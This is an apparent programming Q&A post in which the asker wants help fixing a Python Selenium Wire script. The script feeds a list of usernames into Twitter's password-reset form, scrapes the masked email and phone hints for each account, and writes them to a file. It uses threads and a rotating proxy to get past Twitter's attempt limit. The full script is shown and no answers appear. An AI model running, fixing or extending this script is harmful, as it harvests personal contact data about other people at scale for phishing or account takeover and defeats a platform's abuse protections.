Selenium Wire Proxies | Max retries exceeded with url: /session/11f54991611f7a72a4dd938f34b2854a/url

51 Views Asked by At

I'm trying to make a scraper to scrape the email/number hints from twitter and it works perfectly, the issue is, once it hits the rate limit in my code and restarts the browser with a new session (i have a single rotating proxy that changes ips every session) it finishes the one it was rate limited on perfectly fine, then closes with this error before trying the next:

An error occurred: HTTPConnectionPool(host='localhost', port=59114): Max retries exceeded with url: /session/11f54991611f7a72a4dd938f34b2854a/url (Caused by NewConnectionError('<urllib3.connection.HTTPConnection object at 0x00000225B9F61930>: Failed to establish a new connection: [WinError 10061] No connection could be made because the target machine actively refused it'))

Any clues as to why this happens? or how I can make it better?

I tried this:

import re
import threading
import argparse
from seleniumwire import webdriver
from selenium.webdriver.common.by import By
from selenium.webdriver.chrome.options import Options
import time

from config import proxy

def create_proxy_options():
    return {
        'proxy': {
            'http': proxy,
            'https': proxy,
            'no_proxy': 'localhost,127.0.0.1'
        }
    }

def main():
    parser = argparse.ArgumentParser(description="Twitter Password Reset Script")
    parser.add_argument('--threads', type=int, default=1, help="Number of threads to run")
    args = parser.parse_args()

    with open('usernames.txt', 'r') as file:
        usernames = file.readlines()

    threads = []
    for i in range(args.threads):
        usernames_per_thread = usernames[i::args.threads]
        thread = threading.Thread(target=process_usernames, args=(usernames_per_thread,))
        threads.append(thread)
        thread.start()

    for thread in threads:
        thread.join()

def process_usernames(usernames):
    proxy_options = create_proxy_options()
    driver = webdriver.Chrome(seleniumwire_options=proxy_options)

    try:
        for username in usernames:
            username = username.strip()
            if not reset_password(driver, username, proxy_options):
                continue  # Continue to the next username if it was successful
    except Exception as e:
        print(f"An error occurred: {e}")
    finally:
        driver.quit()

def reset_password(driver, username, proxy_options):
    while True:
        driver.get("https://twitter.com/account/begin_password_reset")

        auth_token_element = driver.find_element(By.NAME, 'authenticity_token')
        auth_token = auth_token_element.get_attribute('value')

        driver.execute_script(f"arguments[0].value = '{auth_token}';", auth_token_element)

        account_identifier_input = driver.find_element(By.NAME, 'account_identifier')
        account_identifier_input.send_keys(username)

        submit_button = driver.find_element(By.XPATH, "//input[@type='submit']")
        submit_button.click()

        if "Enter your email address to continue" in driver.page_source:
            print("Verification needed for username", username)
            return False
        elif "You've exceeded the number of attempts" in driver.page_source:
            print("Rate limit exceeded. Retrying for username", username)
            driver.quit()
            time.sleep(2)
            proxy_options = create_proxy_options()
            driver = webdriver.Chrome(seleniumwire_options=proxy_options)
        else:
            email_hint, number_hint = extract_email_and_number_hints(driver.page_source)
            hint_text = f"{username}:{email_hint or ''}:{number_hint or ''}"
            print(hint_text)
            with open('output.txt', 'a') as output_file:
                output_file.write(hint_text + '\n')
            return True

def extract_email_and_number_hints(page_source):
    email_hint = re.search(r'Send an email to <strong dir="ltr">(.*?)<\/strong>', page_source)
    number_hint = re.search(r'Text a code to the phone number ending in <strong dir="ltr">(.*?)<\/strong>', page_source)

    email_hint_text = email_hint.group(1) if email_hint else None
    number_hint_text = number_hint.group(1) if number_hint else None

    return email_hint_text, number_hint_text

if __name__ == "__main__":
    main()

i was expecting it to close the browser, open it with a new session (to get a different ip) and continue after the one it failed on.

0

There are 0 best solutions below